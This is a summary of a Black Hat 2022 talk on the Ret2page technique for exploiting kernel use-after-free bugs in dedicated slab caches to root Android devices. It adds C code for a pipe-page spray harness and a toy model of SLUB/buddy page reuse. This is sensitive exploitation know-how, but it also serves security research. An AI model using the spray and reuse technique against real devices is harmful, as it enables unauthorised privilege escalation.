
Ret2page: The Art of Exploiting Use-After-Free Vulnerabilities in the Dedicated Cache

Conference:  Black Hat USA 2022

2022-08-11

Summary

The presentation describes the return-to-page (Ret2page) exploitation technique and two vulnerabilities in Android devices that allow privilege escalation.
  • Some drivers hand out attacker-controlled pages, but this is not universally available
  • The io_uring syscall can give total control of pages, but it is blocked under the untrusted_app SELinux domain
  • Two vulnerabilities in Android devices allow for privilege escalation
  • The first vulnerability is reached through nested epoll: a file descriptor is inserted into another epoll file descriptor, creating an inner epoll instance to which a further file is then added
  • The second vulnerability's exploit guesses the kernel slide to bypass the KASLR mitigation
  • Controlling the fd table pointer yields a read primitive of four bytes at a time
  • An arbitrary address read/write (AARW) primitive is obtained by controlling the page of a pipe buffer
The speaker successfully rooted the Pixel 2 through Pixel 5 and other Android 11 flagship devices using the vulnerabilities discussed in the presentation.
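The pipe side of the last two points, as an added example that is not code from the talk: before the pipe-buffer primitive can be used, the attacker needs many page-backed pipe buffers in flight so that one of them reclaims the page the victim slab gives back, and afterwards needs to find out which pipe that was. The harness below (it assumes Linux `pipe(2)` semantics and a 4096-byte page; the marker scheme and the function names are the editor's own) sprays `n` pipes with one full page each, then reads every page back and reports the first pipe whose content no longer matches its marker. With no bug triggered in between it must report -1.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define PIPE_PAGE 4096          /* one pipe_buffer page on arm64/x86-64 (assumption) */
#define MAX_PIPES 256

/* Fill a page-sized buffer with the marker that identifies pipe i. */
static void make_marker(uint8_t *buf, int i)
{
    memset(buf, 0x41, PIPE_PAGE);
    snprintf((char *)buf, 32, "pipe-marker-%d", i);
}

/* Spray: create n pipes and write exactly one page into each, so the kernel
 * backs every pipe with a freshly allocated page, i.e. a candidate for the
 * page the victim slab handed back. Returns the number of pipes set up. */
int spray_pipe_pages(int fds[][2], int n)
{
    static uint8_t buf[PIPE_PAGE];
    int i;
    for (i = 0; i < n; i++) {
        if (pipe(fds[i]) < 0)
            break;
        make_marker(buf, i);
        if (write(fds[i][1], buf, PIPE_PAGE) != PIPE_PAGE) {
            close(fds[i][0]);
            close(fds[i][1]);
            break;
        }
    }
    return i;
}

/* Check: read every page back; a page whose content no longer matches its
 * marker belongs to the pipe that now shares a page with the dangling object.
 * Returns that pipe's index, or -1 if every page is intact. */
int find_tampered_pipe(int fds[][2], int n)
{
    static uint8_t buf[PIPE_PAGE], expect[PIPE_PAGE];
    for (int i = 0; i < n; i++) {
        make_marker(expect, i);
        ssize_t got = read(fds[i][0], buf, PIPE_PAGE);
        if (got != PIPE_PAGE || memcmp(buf, expect, PIPE_PAGE) != 0)
            return i;
    }
    return -1;
}

void close_pipes(int fds[][2], int n)
{
    for (int i = 0; i < n; i++) {
        close(fds[i][0]);
        close(fds[i][1]);
    }
}

/* Whole cycle in one call: spray, check, release. Returns the tampered pipe
 * index, -1 if none, or -2 if fewer than n pipes could be created. */
int spray_and_check(int n)
{
    static int fds[MAX_PIPES][2];
    if (n > MAX_PIPES)
        n = MAX_PIPES;
    int got = spray_pipe_pages(fds, n);
    int res = got < n ? -2 : find_tampered_pipe(fds, got);
    close_pipes(fds, got);
    return res;
}

int main(void)
{
    printf("spray_and_check(32) = %d\n", spray_and_check(32));
    return 0;
}
```

The number of pipes is bounded by the per-user pipe page limit (`/proc/sys/fs/pipe-user-pages-soft`) and the open-file limit, so keep `n` modest and check the spray's return value. The check consumes the pipe data, so it can be run once per spray round; in a real exploit the bug is triggered between `spray_pipe_pages` and `find_tampered_pipe`.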

Abstract

Heap isolation is an effective mitigation that reduces the exploitability of certain types of vulnerabilities, especially Use-After-Free. In the Android/Linux kernel, a Use-After-Free vulnerability in a dedicated cache is difficult to exploit because none of the ideal victim objects can be directly allocated in the same cache, and starting with the Android 11 (android11-5.4) kernel, CONFIG_SLAB_MERGE_DEFAULT is not set by default, which means dedicated caches are no longer merged with compatible caches (merging is done to reduce memory fragmentation). Thus, to exploit a UAF vulnerability in a dedicated cache, a cross-cache attack has to be applied. However, since the well-known cross-cache attack techniques are time-consuming and less deterministic, many Use-After-Free vulnerabilities in dedicated caches attract little attention and are written off as unexploitable bugs.

In this talk, I will introduce "Ret2page", a new and generic exploitation technique. The key idea behind it is to tame both the SLUB and buddy allocators. It aims to reduce time and memory consumption and to improve the success rate of physical page reuse. Moreover, to evaluate the effectiveness of the new technique and compare it with the well-known cross-cache attack techniques, I will analyze two typical Use-After-Free vulnerabilities fixed last year. Last but not least, to achieve arbitrary kernel memory R/W and gain root privilege, I will detail how to exploit each of those two vulnerabilities, bypass the general mitigations (KASLR, PAN, etc.), and build universal Android rooting solutions.

During the presentation, I will give exploit demos of rooting Android flagship devices. In summary, neither the new generic exploitation technique nor the exploitation ideas have been thoroughly presented in any previous talk.
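To make the "tame SLUB and buddy" idea concrete, here is an added user-space model written for this page; it is neither the speaker's code nor kernel code. It keeps the two rules that matter: a dedicated cache reuses freed objects only within itself, and SLUB discards an empty slab to the buddy allocator only if the cache already has `min_partial` slabs on its partial list, otherwise it parks the empty slab there and the page never reaches the page allocator. The model assumes a single CPU, a LIFO page free list standing in for the per-cpu page lists, 512-byte objects in order-0 slabs and a `MIN_PARTIAL` of 3 (real SLUB clamps `min_partial` to 5..10); per-cpu partial slabs, higher-order slabs and the other allocator details the talk deals with are left out. `ret2page_demo(1)` performs the taming step and gets the dangling pointer to alias the page later allocated for a pipe buffer; `ret2page_demo(0)` skips it and shows the page merely being parked.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Toy model (editor's own, not the talk's or the kernel's code) of the
 * SLUB/buddy interaction that Ret2page relies on. */
#define PG_SIZE        4096
#define NPAGES         16
#define OBJ_SIZE       512
#define OBJS_PER_SLAB  (PG_SIZE / OBJ_SIZE)   /* 8 objects per order-0 slab */
#define MIN_PARTIAL    3    /* assumption; real SLUB clamps min_partial to 5..10 */

static uint8_t pages[NPAGES][PG_SIZE];
static int page_of(const void *p) { return (int)(((const uint8_t *)p - &pages[0][0]) / PG_SIZE); }

/* Buddy stand-in: a LIFO list of whole free pages, like the per-cpu page
 * list that hands back the most recently freed page first. */
static int free_pages[NPAGES], nfree;
static void buddy_init(void) { nfree = 0; for (int i = NPAGES - 1; i >= 0; i--) free_pages[nfree++] = i; }
static int  buddy_alloc(void) { return nfree ? free_pages[--nfree] : -1; }
static void buddy_free(int pg) { free_pages[nfree++] = pg; }

/* A dedicated (unmerged) kmem_cache: one cpu slab, a node partial list and a
 * per-slab freelist. Full slabs are tracked nowhere, as in SLUB. */
struct kmem_cache {
    int active, next_obj;                  /* cpu slab and its first never-used slot */
    int inuse[NPAGES], nfreeobj[NPAGES];
    void *freeobj[NPAGES][OBJS_PER_SLAB];
    int partial[NPAGES], nr_partial;
};

static void cache_init(struct kmem_cache *c) { memset(c, 0, sizeof *c); c->active = -1; }

static void *cache_alloc(struct kmem_cache *c)
{
    if (c->active < 0 || (c->nfreeobj[c->active] == 0 && c->next_obj == OBJS_PER_SLAB)) {
        if (c->nr_partial) {                         /* get_partial(): reuse a partial slab */
            c->active = c->partial[--c->nr_partial];
            c->next_obj = OBJS_PER_SLAB;
        } else {                                     /* new_slab(): take a page from buddy */
            c->active = buddy_alloc();
            c->next_obj = 0;
        }
    }
    c->inuse[c->active]++;
    if (c->nfreeobj[c->active])                      /* freed objects come back first */
        return c->freeobj[c->active][--c->nfreeobj[c->active]];
    return &pages[c->active][c->next_obj++ * OBJ_SIZE];
}

static void cache_free(struct kmem_cache *c, void *obj)
{
    int pg = page_of(obj);
    c->freeobj[pg][c->nfreeobj[pg]++] = obj;
    c->inuse[pg]--;
    if (pg == c->active)
        return;                                      /* fast path: slab stays the cpu slab */
    if (c->nfreeobj[pg] == 1)                        /* full -> partial: put on the partial list */
        c->partial[c->nr_partial++] = pg;
    if (c->inuse[pg] == 0 && c->nr_partial >= MIN_PARTIAL) {
        /* slab_empty: only now is the page unlinked and discarded to buddy */
        for (int i = 0; i < c->nr_partial; i++)
            if (c->partial[i] == pg) { c->partial[i] = c->partial[--c->nr_partial]; break; }
        c->nfreeobj[pg] = 0;
        buddy_free(pg);
    }
}

/* Walks the Ret2page steps; returns 1 when the dangling pointer ends up inside
 * the page later handed out for a "pipe buffer", 0 when the page stays parked. */
int ret2page_demo(int tame_partial_list)
{
    struct kmem_cache victim;
    void *objs[MIN_PARTIAL * OBJS_PER_SLAB + 1];
    int n = MIN_PARTIAL * OBJS_PER_SLAB + 1, i;

    buddy_init();
    cache_init(&victim);

    /* 1. Spray: MIN_PARTIAL full slabs plus one object, so slab 0 (the one
     *    holding the UAF object) is no longer the cpu slab. */
    for (i = 0; i < n; i++)
        objs[i] = cache_alloc(&victim);
    void *dangling = objs[3];
    int victim_page = page_of(dangling);

    /* 2. Tame SLUB: put MIN_PARTIAL - 1 other slabs on the partial list by
     *    freeing one object from each; otherwise the emptied victim slab is
     *    merely parked there and its page never reaches the buddy allocator. */
    if (tame_partial_list)
        for (i = 1; i < MIN_PARTIAL; i++)
            cache_free(&victim, objs[i * OBJS_PER_SLAB]);

    /* 3. The bug frees the object but the pointer is kept; then every other
     *    object on the same slab is freed so the slab becomes empty. */
    cache_free(&victim, dangling);
    for (i = 0; i < OBJS_PER_SLAB; i++)
        if (i != 3)
            cache_free(&victim, objs[i]);

    /* 4. Tame buddy: the next page allocation (a pipe buffer page) receives
     *    the page just discarded, so the dangling pointer now reads pipe data. */
    int pipe_page = buddy_alloc();
    memset(pages[pipe_page], 'P', PG_SIZE);
    return pipe_page == victim_page && *(uint8_t *)dangling == 'P';
}

int main(void)
{
    printf("without taming the partial list: page reused = %d\n", ret2page_demo(0));
    printf("with taming:                     page reused = %d\n", ret2page_demo(1));
    return 0;
}
```

On a SLUB target the real threshold can be read from `/sys/kernel/slab/<cache>/min_partial`, and `/sys/kernel/slab/<cache>/aliases` shows whether the cache was merged with others (0 for an unmerged dedicated cache, which is what CONFIG_SLAB_MERGE_DEFAULT being off gives unless merging was re-enabled on the kernel command line). The order in step 3 is the point of the model: freeing the victim slab before the partial list holds enough slabs leaves the page inside the cache, where no useful object can reclaim it.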
